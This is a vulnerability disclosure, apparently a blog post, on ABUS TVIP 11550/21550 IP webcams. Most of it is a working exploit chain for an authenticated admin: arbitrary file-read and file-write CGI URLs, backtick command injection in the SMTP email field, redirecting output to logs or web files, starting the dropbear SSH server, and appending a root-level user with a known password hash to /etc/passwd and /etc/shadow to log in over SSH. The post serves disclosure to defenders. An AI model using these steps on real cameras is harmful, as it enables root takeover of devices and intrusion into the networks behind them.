Title : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams) Author : Marco van Berkum - Summary - Arbitrary file read - Arbitrary file upload - Arbitrary command excution (input validation bug) - How it's totally compromised including ssh root login. - Summary The ABUS 11550 and 21550 are IP Webcams that can be configured via a webinterface. While experimenting multiple vulnerabilities where discovered that give rootaccess to the Operating System, debian-linux, of the camera. The webserver of the camera is BOA and runs as root. Although these vulnerabilities can ONLY be exploited when logged in as admin, they can still be considered critical since the camera can be used to gain access to the network behind it. I did not find a way past the login screen without proper credentials (yet). - Arbitrary file read When logged in as admin its possible to read any file on the filesystem since the webserver is running as root. http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow - Arbitrary file upload Similar to the fileread CGI there also is a filewrite CGI that can (over)write any file. http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE - Arbitrary command execution (input validation bug) The camera has several htmlforms to configure services such as a FTPclient and a SMTPclient. These are used to notify users and upload videos when the camera's motion detection detects movement. These htmlforms can be used to execute arbitrary commands as root. I've found bugs in the SMTP and FTP forms but probably other forms will contain the same bug (unchecked). Exploit: In the configuration -> smtp general part is a webform where an administrator's emailadress can be filled out (Administrator e-Mail address). The form lacks checking metacharacters such as ;, | and `. When a test email from this form is sent the webinterface executes ssmtp -t. So it is possible to 'break' the commandline by using `ls` for instance. After submitting the command via the 'testbutton' this will be the output: smtp: Connect to host smtp: MAIL FROM: SMTP server error ................SMTP Test Failed........... Which means we are situated in a directory that contains a backup directory. `pwd` also works smtp: Connect to host smtp: MAIL FROM: SMTP server error ................SMTP Test Failed........... Unfortunately this only outputs the first line of the commandline output. But, we can work around this :) The system also contains a System Log function that shows output of the systemlog. Now, if we want a little more output than just the first line, for instance "ls /" we can do it by filling out `ls /|logger` which sends the output to the system logfile. Which can then be viewed from the webinterface. Oct 8 14:35:15root: bin Oct 8 14:35:15 root: dev Oct 8 14:35:15 root: etc Oct 8 14:35:15 root: include Oct 8 14:35:15 root: init Oct 8 14:35:15 root: lib Oct 8 14:35:15 root: linuxrc Oct 8 14:35:15 root: mnt Oct 8 14:35:15 root: opt Oct 8 14:35:15 root: proc Oct 8 14:35:15 root: root Oct 8 14:35:15 root: sbin Oct 8 14:35:15 root: smtp_test.sh Oct 8 14:35:15 root: sys Oct 8 14:35:15 root: tag_replace.sh Oct 8 14:35:15 root: tmp Oct 8 14:35:15 root: usr Oct 8 14:35:15 root: var Oct 8 14:35:15 root: web Getting the correct commandline output can also be obtained by redirecting it to a readble file on de webserver itself by doing `ls -alR />/web/html/lsoutput.txt` It can then be accessed by the url http://ipcamera/lsoutput.txt - How it's totally compromised including ssh root login. I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to see what was on the filesystem and noticed that dropbear is available on the system. Dropbear is a SSHserver/Client :) So, I started it with the `/etc/dropbear/dropbear` command. Then I took a look at the /etc/shadowfile and noticed that user root had no password, so ssh'ing in was not an option, yet. So had to create a user, did it the following way: `echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd` and `echo "test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow` So, now we can login as user test with password test. User test has UID 0, thus root. test@ipcamera's password: Welcome to _____ __ ___ __ ___ _ _ _ | ___| / / __ / | _ / / / | |___ / / | /__ / / | | | / / V / | ___|| |__| | | _ / | |__| | | | | | | |__| | / | | | __ | | | | __ | | |_/ / | __ | | | |_| |_| |_| |_| \_|_| |_| |___ / |_| |_| |_| For further information check: http://www.GM.com/ BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. [test]# Voila ;) Also, its possible to mount a samba or nfsshare via the webinterface and copy files that way. Just my two cents Marco van berkum
0 comments:
Post a Comment